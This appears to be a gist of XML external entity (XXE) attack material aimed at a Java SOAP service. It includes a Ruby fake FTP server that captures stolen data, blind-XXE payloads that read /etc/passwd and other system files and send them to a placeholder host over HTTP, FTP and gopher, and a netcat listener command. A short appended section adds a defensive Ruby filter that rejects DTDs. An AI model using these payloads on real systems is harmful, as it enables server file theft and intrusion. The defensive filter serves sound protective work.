Last active: November 22, 2016 14:51
Used against Java Soap Service
#!/usr/bin/env ruby
# Minimal fake FTP server: it answers every command with a "continue" reply so
# that the victim's XML parser keeps streaming the file contents it was told to
# send to ftp://x.x.x.x:y/ (see the "extraction with FTP" payload below).
require 'socket'

port = ARGV[0] || 31337
server = TCPServer.new port
puts "Listening on the port: #{port}"

loop do
  Thread.start(server.accept) do |client|
    puts "Client connected"
    client.puts("220 xxe-ftp-server")
    loop do
      req = client.gets
      # gets returns nil once the client disconnects; without this check the
      # thread dies with a NoMethodError on req.include?
      break if req.nil?
      puts "< " + req
      if req.include? "USER"
        client.puts("331 password please - version check")
      else
        client.puts("230 more data please!")
      end
    end
    client.close
  end
end
--------------------------------------------------------------
XXE, where the text is reflected in the response
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close

<!DOCTYPE r [
<!ENTITY % start "<![CDATA[">
<!ENTITY % body SYSTEM "file:///etc/test.xml">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;
]>
...
<legitimate>&all;</legitimate>
--------------------------------------------------------------
a.dtd:
<!ENTITY all "%start;%body;%end;">
--------------------------------------------------------------

--------------------------------------------------------------
XXE Locator, making remote connection
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close

<!DOCTYPE r [
<!ENTITY connect SYSTEM "http://x.x.x.x:y/test">
]>
<r>&connect;</r>
--------------------------------------------------------------

--------------------------------------------------------------
XXE Blind Payload, without proper URL encoding
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close

<!DOCTYPE r [
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % data SYSTEM "file:///etc/system-release">
<!ENTITY % param1 "<!ENTITY send SYSTEM 'http://x.x.x.x:y/?%data;'>">
--------------------------------------------------------------

--------------------------------------------------------------
XXE Blind Payload, extraction with FTP
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close

<!DOCTYPE r [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % connect SYSTEM "http://x.x.x.x:y/a.dtd">
%connect;
%param1;
%send;
]>
--------------------------------------------------------------
a.dtd:
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://x.x.x.x:y/%data;'>">
--------------------------------------------------------------

--------------------------------------------------------------
XXE Blind Payload, extraction with gopher (using socket on port z)
--------------------------------------------------------------
POST /service/ss HTTP/1.1
Content-Type: text/xml
Connection: close

<!DOCTYPE r [
<!ENTITY % file SYSTEM "file:///proc/self/cwd">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:y/a.dtd">
%dtd;]>
<r>&send;</r>
--------------------------------------------------------------
a.dtd:
<!ENTITY % yy "<!ENTITY send SYSTEM 'gopher://x.x.x.x:z/?%file;'>">
%yy;
--------------------------------------------------------------
$ nc -lvnp z
--------------------------------------------------------------
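Added example, not part of the gist: every payload above depends on a DOCTYPE with entity declarations, so a fail-closed gate that rejects any request body carrying a DTD before it reaches the SOAP parser stops all of them without parsing the XML. Written in Ruby like the gist's own server; it assumes the raw body is available as a string, and the sample inputs (the Locator payload from above and a benign SOAP envelope) are constructed. It complements, not replaces, disabling DTDs in the parser itself (for Xerces-based Java parsers, the http://apache.org/xml/features/disallow-doctype-decl feature).

```ruby
# Added example (not from the gist): pre-parse XXE gate for an XML/SOAP endpoint.

# Returns the XXE-related constructs found in the body, empty if none.
# Comments and CDATA are intentionally NOT stripped first: a false positive on
# an odd but benign document is cheaper than an exfiltrated /etc/passwd.
def xxe_indicators(xml)
  findings = []
  findings << "doctype"             if xml.match?(/<!DOCTYPE\b/)
  findings << "entity-declaration"  if xml.match?(/<!ENTITY\b/)
  findings << "external-identifier" if xml.match?(/<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b/m)
  # Parameter-entity references (%name;) matter inside the DTD internal subset,
  # which is where the blind payloads above trigger the fetch of a.dtd.
  subset = xml[/<!DOCTYPE\b[^\[>]*\[(.*?)\]\s*>/m, 1]
  findings << "parameter-entity-reference" if subset && subset.match?(/%[\w.-]+;/)
  findings
end

# Gate decision: accept only bodies with no DTD constructs at all.
def accept_xml_body?(xml)
  xxe_indicators(xml).empty?
end

# Constructed samples: the "XXE Locator" body from the gist and a benign SOAP call.
LOCATOR_PAYLOAD = <<~XML
  <!DOCTYPE r [
  <!ENTITY connect SYSTEM "http://x.x.x.x:y/test">
  ]>
  <r>&connect;</r>
XML

BENIGN_SOAP = <<~XML
  <?xml version="1.0"?>
  <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body><getStatus><id>42</id></getStatus></soap:Body>
  </soap:Envelope>
XML

if __FILE__ == $0
  [LOCATOR_PAYLOAD, BENIGN_SOAP].each do |body|
    verdict = accept_xml_body?(body) ? "accept" : "reject"
    puts "#{verdict}: #{xxe_indicators(body).inspect}"
  end
end
```

Log the findings array on every rejection; a sudden run of "parameter-entity-reference" hits against one endpoint is exactly the blind-XXE probing the payloads above produce.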